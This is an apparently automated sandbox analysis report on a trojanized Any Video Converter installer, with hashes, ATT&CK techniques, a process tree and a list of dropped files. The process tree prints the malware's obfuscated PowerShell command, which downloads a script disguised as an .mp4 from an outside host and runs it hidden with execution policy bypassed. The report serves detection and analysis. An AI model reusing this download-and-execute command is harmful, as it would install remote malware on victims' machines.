b50684c8b67697c9c76aca764ef225bd01eef031976a5237cdbafa0dba98f7f3

General

Target

784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
Size

41.4MB
MD5

718ed13004aee0ac798c8ba3a6a611b1
SHA1

d4e03ba4ed89c82a50f4b0286b41ccba5c2fbe26
SHA256

784219977ec25385fa9ebba5e4f7bd26f9807a7695b9bb3ba5fb910cab8061be
SHA512

ee06e514905c642bc772f5a38408bac22da3ec82920aa346d374cd7a6c3f64f178bfaa7a6273c820e7dd82ec8cafe8dbd45685c9e68e710f3a0a4b400b1c2c69
SSDEEP

786432:cIVnXbLTKsTSBIildiswnDD5fuksujJi9gGGDFYUzgzZrBevOJ4j2QGwcrgbW:1VsI+5EfJsG09sFYUzk8vOJ8gwcrSW

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.top4top.io/m_1891i29ay1.mp4

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe
772	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2716	avc-ultimate.exe
1772	avc-ultimate.tmp

Loads dropped DLL 7 IoCs

pid	Process
2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
2716	avc-ultimate.exe
1772	avc-ultimate.tmp
1772	avc-ultimate.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\Uninstall.ini	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
File opened for modification	C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
File opened for modification	C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\Uninstall.exe	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avc-ultimate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avc-ultimate.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2796	powershell.exe
772	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2728	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	30
PID 2376 wrote to memory of 2728	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	30
PID 2376 wrote to memory of 2728	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	30
PID 2376 wrote to memory of 2728	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	30
PID 2728 wrote to memory of 2796	2728	WScript.exe	31
PID 2728 wrote to memory of 2796	2728	WScript.exe	31
PID 2728 wrote to memory of 2796	2728	WScript.exe	31
PID 2728 wrote to memory of 2796	2728	WScript.exe	31
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2376 wrote to memory of 2716	2376	784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe	33
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2716 wrote to memory of 1772	2716	avc-ultimate.exe	34
PID 2796 wrote to memory of 772	2796	powershell.exe	35
PID 2796 wrote to memory of 772	2796	powershell.exe	35
PID 2796 wrote to memory of 772	2796	powershell.exe	35
PID 2796 wrote to memory of 772	2796	powershell.exe	35

C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
"C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:772
- C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe
  "C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Users\Admin\AppData\Local\Temp\is-1SUE0.tmp\avc-ultimate.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-1SUE0.tmp\avc-ultimate.tmp" /SL5="$601F2,42677709,137216,C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$inst\0005.tmp

Filesize
1.3MB

MD5
91f0120c96e48e31d29f0a5d5507866c

SHA1
ca3ae973ebb1861de17a8659b0f0de86d384f4b6

SHA256
34f0b712e91636e228a516fa5f6e0ef6d819b96cadcf959a7ab11e343b6f8e00

SHA512
5099911ca8d3bc5552bb4ff543e0b5d128a6c090625c1cd4cc43f4f1b3b6dd1b717f30f67cc951fcaa52fdd25ef0f588eccbdc86798364c714923d0278304f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1

Filesize
232KB

MD5
7e9a5c74501529c97a0675dc7d3e36cc

SHA1
c090ead740db008ed6bb1832c31065911103e349

SHA256
c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157

SHA512
81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

Download Submit
C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs

Filesize
153KB

MD5
2591c7f4c1ebca785ccb7c074f66782a

SHA1
080fa10f63666f48ed0136eb6dfbe5b914292668

SHA256
d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec

SHA512
658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
96f1812292aa2fc8aaf2874cc75fce98

SHA1
d2629eae4926e438c19cbc22cba97e0345008c03

SHA256
c97ae2ef8b27bb131850f6897832241a5db4712cd0eccdfb2ba7f632f635a4a6

SHA512
b62e60a9137c940f517be525e707b63e4d5e2f28f45f81f67cfed70386577aa9bf2f3f474aaef4a387e038de3b46e27f2b7e329052b51f6f6280c29112b4c5af

Download Submit
\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe

Filesize
41.3MB

MD5
b33141c0cc6f9fa0ce2e9d927f6710ca

SHA1
3245dda9dd7cb826469941fde7c41a09e283ffc0

SHA256
e6891c2c2fd45f118d60044edcf66d394141ea572bfb27d8686e1bc9b36020b1

SHA512
0a91e819540575c729cd62e361cd39bbc3b81b29b68606e035a000761304c85f36a8941c0de2305f741f17f32efd7ababa9d5bea277f0f35bb454fa6a6addb0c

Download Submit
\Users\Admin\AppData\Local\Temp\is-1SUE0.tmp\avc-ultimate.tmp

Filesize
1.1MB

MD5
7fffc9d80d54551bc786b91137a1a960

SHA1
9302425c93c4eaa2f0b41fbfebe817fed6c4f240

SHA256
4bec5b6b36528b46e18ba64efbf734ee25cceec0d2e8ebb22e097f208a9ea1a4

SHA512
d37224ac1c0ed77da336673e6ee204424ed4ab05aa952c521f920dc134780fd48d8a58f9b78aac3e729e5a597705e6b4e642f2602c2d664776f2edef93abe584

Download Submit
\Users\Admin\AppData\Local\Temp\is-JOCJA.tmp\SoundCardConf.dll

Filesize
1.6MB

MD5
21f9e77769bca6b8b187b787f3c3086b

SHA1
816ef51f7e1523860cc98987e5a28d98eaa61ce0

SHA256
709e63042f882160ddab316475616eb47ff027eb92d898318a242b786dda9fe3

SHA512
42ab4e668a8484136933161c71d9b80a640ab6a96090be45cd6dfd7764b863e907dacffc46a09dbdfb483093f62482a848e976367f166690b765ea15ea814a67

Download Submit
\Users\Admin\AppData\Local\Temp\is-JOCJA.tmp\drvman.dll

Filesize
88KB

MD5
0f66c9c3fde3db6e543ebbb49099b626

SHA1
d2ff83a28a07445496c99588de510c6c92d4a08e

SHA256
52a90531785f52b37efb59444712054e3b5748a4213d4af31728718f55962702

SHA512
f56dbcb2b436c8054849044126b020ed0318dd760561154bd8b4a99dea83197c0dce24107daee9e73c47702fac5c1df0086cc3f080f64b883eadb66679652260

Download Submit
memory/1772-89-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-104-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-125-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-122-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-119-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-92-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-95-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-98-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-101-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-80-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-107-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-110-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-113-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/1772-116-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/2376-78-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2716-58-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2716-79-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download

Analysis

Sharing